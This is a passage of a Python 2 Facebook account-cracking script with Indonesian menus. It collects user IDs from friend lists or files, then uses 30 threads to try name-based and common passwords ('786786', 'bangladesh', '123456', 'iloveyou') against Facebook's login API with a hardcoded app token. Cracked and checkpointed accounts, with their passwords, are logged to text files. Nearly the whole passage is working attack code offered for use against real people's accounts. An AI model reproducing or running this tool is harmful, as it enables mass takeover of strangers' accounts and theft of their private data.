for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;96m●●● \033[1;97mCRACK BANGLADESH \033[1;96m●●●")
print 50* "\033[1;94m─"
idb = raw_input("\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m ID Publik/Teman \033[1;91m:\033[1;92m ")
try:
pok = requests.get("https://graph.facebook.com/"+idb+"?access_token="+toket)
sp = json.loads(pok.text)
print"\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m Nama \033[1;91m:\033[1;92m "+sp["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;96m{\033[1;97m<Kembali>\033[1;96m}")
crack_bangla()
except requests.exceptions.ConnectionError:
print"{!} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idb+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print 50* "\033[1;94m─"
print (" \033[1;96m●●● \033[1;97mCRACK BANGLADESH \033[1;96m●●●")
print 50* "\033[1;94m─"
idlist = raw_input('\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m Nama File \033[1;91m:\033[1;92m ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada !'
raw_input("\n\033[1;96m{\033[1;97m<Kembali>\033[1;96m}")
crack_bangla()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m{\033[1;91m!\033[1;97m} Isi Yg Benar !"
pilih_bangla()
print "\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m Total ID \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m Stop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;96m●\033[1;97m}\033[1;96m Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN BANGLADESH #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos1
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos2
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos3
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos4
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = ('bangladesh')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos5
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['first_name'].lower()+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos6
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos7 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos7
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos7
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos8 = j['last_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos8
oke = open("done/bangla.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos8
cek = open("done/bangla.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mSelesai ...'
print"\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mTotal \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;96mfile tersimpan \033[1;91m: \033[1;92mdone/bangla.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;96mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK USA #####
def crack_usa():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;95m01\033[1;97m} Crack Dari Daftar Teman"
print "\033[1;97m{\033[1;95m02\033[1;97m} Crack Dari Publik/Teman"
print "\033[1;97m{\033[1;95m03\033[1;97m} Crack Dari File"
print "\033[1;97m{\033[1;91m00\033[1;97m} Kembali"
print 50* "\033[1;94m─"
pilih_usa()
#### PILIH USA ####
def pilih_usa():
teak = raw_input("\033[1;95m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_usa()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;95m●●● \033[1;97mCRACK USA \033[1;95m●●●")
print 50* "\033[1;94m─"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;95m●●● \033[1;97mCRACK USA \033[1;95m●●●")
print 50* "\033[1;94m─"
idt = raw_input("\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mID Publik/Teman \033[1;91m:\033[1;92m ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mNama \033[1;91m:\033[1;92m "+op["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
crack_usa()
except requests.exceptions.ConnectionError:
print"\033[1;97m{\033[1;91m!\033[1;97m} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print 50* "\033[1;94m─"
print (" \033[1;95m●●● \033[1;97mCRACK USA \033[1;95m●●●")
print 50* "\033[1;94m─"
idlist = raw_input('\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mNama File\033[1;91m :\033[1;92m ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada !'
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
crack_usa()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_usa()
print "\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN USA #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/usa.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos1
cek = open("done/usa.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/usa.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos2
cek = open("done/usa.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/usa.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos3
cek = open("done/usa.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = ('123456')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/usa.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos4
cek = open("done/usa.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = ('iloveyou')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/usa.txt", "a")
